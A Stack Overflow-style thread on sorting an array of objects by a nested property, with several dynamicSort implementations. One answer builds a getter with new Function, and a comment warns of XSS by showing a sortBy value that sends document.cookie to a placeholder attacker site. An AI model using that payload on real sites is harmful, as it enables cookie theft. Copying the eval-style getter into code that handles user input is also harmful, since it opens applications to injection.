# Sort array of objects of objects in javascript

Tags: javascript, arrays, sorting, javascript-objects

I want to sort the below array by the "name" that is inside "user" object

```
 var myArr = [
 {"id":1,"user":{"name":"allen","id":101}},
 {"id":2,"user":{"name":"martin","id":102}}
]
```

how can I do this?

I have a method to sort array of objects but I can't use it for array of objects of objects

this is the method:

```
function dynamicSort(property) {
    var sortOrder = 1;
    if (property[0] === "-") {
        sortOrder = -1;
        property = property.substr(1);
    }
    return function (a, b) {
            var result = (a[property] < b[property]) ? -1 : (a[property] > b[property]) ? 1 : 0;
        return result * sortOrder;
    }
}
```

then I can sort using this:

```
myArr.sort(dynamicSort("id"));
```

Comment: Check the answer of this question: [Sort array by firstname (alphabetically) in Javascript](https://stackoverflow.com/questions/6712034/sort-array-by-firstname-alphabetically-in-javascript#6712080)

Comment: @Skeevs, he requires sorting for nested objects. not for single object.

Answer (score 5, accepted):

I would create property as a getter function (For the complex examples. You could check if propFn is a function, use this below for the more complex ones. See [this answer](https://stackoverflow.com/a/6000009/4875631) for checking is `propFn` is a function.):

```js
var myArr = [
  {"id":1,"user":{"name":"allen","id":101}},
  {"id":2,"user":{"name":"martin","id":102}}
]

function dynamicSort(propFn, sortOrder = 1) {
    return function (a, b) {
        var result = (propFn(a) < propFn(b)) ? -1 : (propFn(a) > propFn(b)) ? 1 : 0;
        return result * sortOrder;
    }
}

console.log(myArr.sort(dynamicSort((obj) => obj.user.name)));
console.log(myArr.sort(dynamicSort((obj) => obj.user.name, -1)));
```

Alternatively, you can take a look at: [Convert JavaScript string in dot notation into an object reference](https://stackoverflow.com/questions/6393943/convert-javascript-string-in-dot-notation-into-an-object-reference)

This will give you an idea of how you can convert period notation into a nested object, but I recommend reading the disclaimer at the top.

To maintain backwards compatibility, you could use something like this below:

```js
var myArr = [
  {"id":1,"user":{"name":"allen","id":101}},
  {"id":2,"user":{"name":"martin","id":102}}
]

function dynamicSort(propFn, sortOrder = 1) {
    if (typeof propFn === "string") {
        let prop = propFn;
        if (prop[0] === "-") {
            sortOrder = -1;
            prop = prop.substr(1);
        }

        propFn = (obj) => obj[prop];
    }
    return function (a, b) {
        var result = (propFn(a) < propFn(b)) ? -1 : (propFn(a) > propFn(b)) ? 1 : 0;
        return result * sortOrder;
    }
}

console.log(myArr.sort(dynamicSort((obj) => obj.user.name)));
console.log(myArr.sort(dynamicSort((obj) => obj.user.name, -1)));
console.log(myArr.sort(dynamicSort("id")));
console.log(myArr.sort(dynamicSort("-id")));
```

Comment: Really neat, was just passing by, but I will definetely use it, thanks !

Answer (score 2):

**Edit:**

If you are experiencing problems because of periods in your key names, this approach may be better suited as a solution. The path just has to either start as a bracket notation accessor or with a dot:

```js
function dynamicSort(property, order) {
  order||(order=1);
  const getter = new Function("obj", "return obj" + property + ";");
  return function(a, b) {
    var result = (getter(a) < getter(b)) ? -1 : (getter(a) > getter(b)) ? 1 : 0;
    return result * order;
  }
}

var myArr = [{
    "id": 1,
    "user": {
      "name": "allen",
      "id": 101
    }
  },
  {
    "id": 2,
    "user": {
      "name": "martin",
      "id": 102
    }
  },
  {
    "id": 3,
    "user": {
      "name": "barry",
      "id": 103
    }
  }
]

console.log(JSON.stringify(myArr.sort(dynamicSort(".user.name"))));
```

---

Using the `Object.byString()` method from [this answer](https://stackoverflow.com/questions/6491463/accessing-nested-javascript-objects-with-string-key), you can rewrite your function to take a path to the property you want to sort by:

```js
var myArr = [
 {"id":1,"user":{"name":"allen","id":101}},
 {"id":2,"user":{"name":"martin","id":102}},
 {"id":3,"user":{"name":"barry","id":103}}
]

console.log(JSON.stringify(myArr.sort(dynamicSort("user.name"))));


function dynamicSort(property) {
    var sortOrder = 1;
    if (property[0] === "-") {
        sortOrder = -1;
        property = property.substr(1);
    }
    return function (a, b) {
            var result = (byString(a, property) < byString(b, property)) ? -1 : (byString(a, property) > byString(b, property)) ? 1 : 0;
        return result * sortOrder;
    }
}

function byString(o, s) {
    s = s.replace(/\[(\w+)\]/g, '.$1'); // convert indexes to properties
    s = s.replace(/^\./, '');           // strip a leading dot
    var a = s.split('.');
    for (var i = 0, n = a.length; i < n; ++i) {
        var k = a[i];
        if (k in o) {
            o = o[k];
        } else {
            return;
        }
    }
    return o;
}
```

I think it would be a little clearer and easier to use if you have the order as a second parameter, which means that your function should then more or less look like this:

```js
function dynamicSort(property, order) {
  return function(a, b) {
    var result = (byString(a, property) < byString(b, property)) ? -1 : (byString(a, property) > byString(b, property)) ? 1 : 0;
    return result * order;
  }
}
```

Comment: Nice! This seemed pretty challenging at first, but wasn't that hard to find a solution in the end :-)

Comment: What if the key actually contains a period in it? I've always been opposed to solutions like these, as they tend to cause more trouble than they're worth. (Read the giant disclaimer at the top of [this answer](https://stackoverflow.com/a/6394168/4875631), which is another alternative to your `byString` method.)

Comment: Yes, I didn't really take that into consideration, the disclaimer is very much right, and may be worth for @kouroshstst to read up on it.

Comment: Your edit is essentially EVAL, and that's a whole lot worse. It opens your app up for what could be some nasty XSS attacks, if not properly sanitized.

Comment: @FrankerZ how do you mean by xss attack? array being served to this method is coming from redux store and redux store is filled by a request from api

Comment: @kouroshstst What if you pass a get variable to `dynamicSort` (Something like `myscript?sortBy=user.name` as a URL parameter.) If you use the eval function, you can do some nasty things. `?sortBy=.a || window.location.href='http://mynastysite.com?' + document.cookie`.

Comment: The easiest way to see this in action, is copy his answer, and use `console.log(JSON.stringify(myArr.sort(dynamicSort(".test || alert('test')"))));` instead of `console.log(JSON.stringify(myArr.sort(dynamicSort(".user.name"))));`

Comment: @FrankerZ I see your point, but still it is not possible to this kind of thing in an online application with static minfied js, is it?

Comment: @kouroshstst As long as you're not passing variables to dynamicSort, then you're fine. But as soon as you start using eval, it requires you to know that, which is why this is bad. If a new programmer comes along, and decides to make sorting customizable, you could have issues. Worst case scenario, use his original answer, which should work with . notation and doesn't require eval.

Answer (score 0):

You could use `sort` method but you first need to get nested property and for that you could pass a string and then use `reduce` method to get property.

```js
 var myArr = [{"id":2,"user":{"name":"martin","id":102}}, {"id":1,"user":{"name":"allen","id":101}}]

function dynamicSort(arr, prop) {
  function getVal(obj, prop) {
    return prop.split('.').reduce((r, e) => r[e] || {}, obj)
  }

  arr.sort((a, b) => {
    let vA = getVal(a, prop);
    let vB = getVal(b, prop);
    return vA.localeCompare(vB)
  })
}

dynamicSort(myArr, "user.name")
console.log(myArr)
```

Answer (score 0):

Check out [this SO answer](https://stackoverflow.com/a/5073866/10146245) for an answer to a fundamentally similar question.

Since the function in that answer is called differently than yours, with the array to be sorted passed in as a parameter, you could refactor it to be called in the same way as your existing `dynamicSort` function as follows:

```
function dynamicSort(property) {
    var sortOrder = 1;
    if (property[0] === "-") {
        sortOrder = -1;
        property = property.substr(1);
    }
    var prop = property.split('.');
    var len = prop.length;

    return function (a, b) {
        var i = 0;
        while( i < len ) { a = a[prop[i]]; b = b[prop[i]]; i++; }
        var result = (a < b) ? -1 : (a > b) ? 1 : 0;
        return result * sortOrder;
    }
}
```

You could then call it like so: `myArr.sort(this.dynamicSort("user.name"))`.

Here is a working snippet to demonstrate:

```js
function dynamicSort(property) {
    var sortOrder = 1;
    if (property[0] === "-") {
        sortOrder = -1;
        property = property.substr(1);
    }
 var prop = property.split('.');
    var len = prop.length;

    return function (a, b) {
  var i = 0;
        while( i < len ) { a = a[prop[i]]; b = b[prop[i]]; i++; }
        var result = (a < b) ? -1 : (a > b) ? 1 : 0;
        return result * sortOrder;
    }
}

var myArr = [
 {"id":1,"user":{"name":"allen","id":101}},
 {"id":2,"user":{"name":"martin","id":102}},
 {"id":3,"user":{"name":"beth","id":103}},
];

console.log(myArr.sort(this.dynamicSort("user.name"))); //expected output: [{id:1, user:{name:"allen",...}}, {id:3, user:{name:"beth",...}}, {id:2, user:{name:"martin",...}}]
```

Comment: I started this answer earlier before the fine answers above were contributed, but got interrupted. Now I just wanted to finish and contribute it in case the potentially easier syntax of calling it was appealing to anyone looking at this question.

Answer (score -1):

Try this out. Works fine for me

```
var sortedArray = myArr.sort((a, b) => {

        const
            nameA = a.user.name.toUpperCase(),
            nameB = b.user.name.toUpperCase();

        if(nameA < nameB)
            return -1;

        if(nameA > nameB)
            return 1;

        return 0;
    });
```

Comment: This isn't really dynamic, which (albeit not very clear) is the problem the OP has

Comment: I thought commenting made it clear what's wrong with this answer. Again, the OP is actually asking for a solution that they can use with different, or dynamic keys to sort by. You may want to look at my answer if it's still not clear

Answer (score -1):

```
myArr.sort(function(a, b) {
    return a.user.name.localeCompare(b.user.name);
});
```

Comment: This isn't really dynamic, which (albeit not very clear) is the problem the OP has

Comment: Thank you for this code snippet, which might provide some limited, immediate help. A [proper explanation would greatly improve its long-term value](//meta.stackexchange.com/q/114762/206345) by showing _why_ this is a good solution to the problem, and would make it more useful to future readers with other, similar questions. Please [edit] your answer to add some explanation, including the assumptions you've made.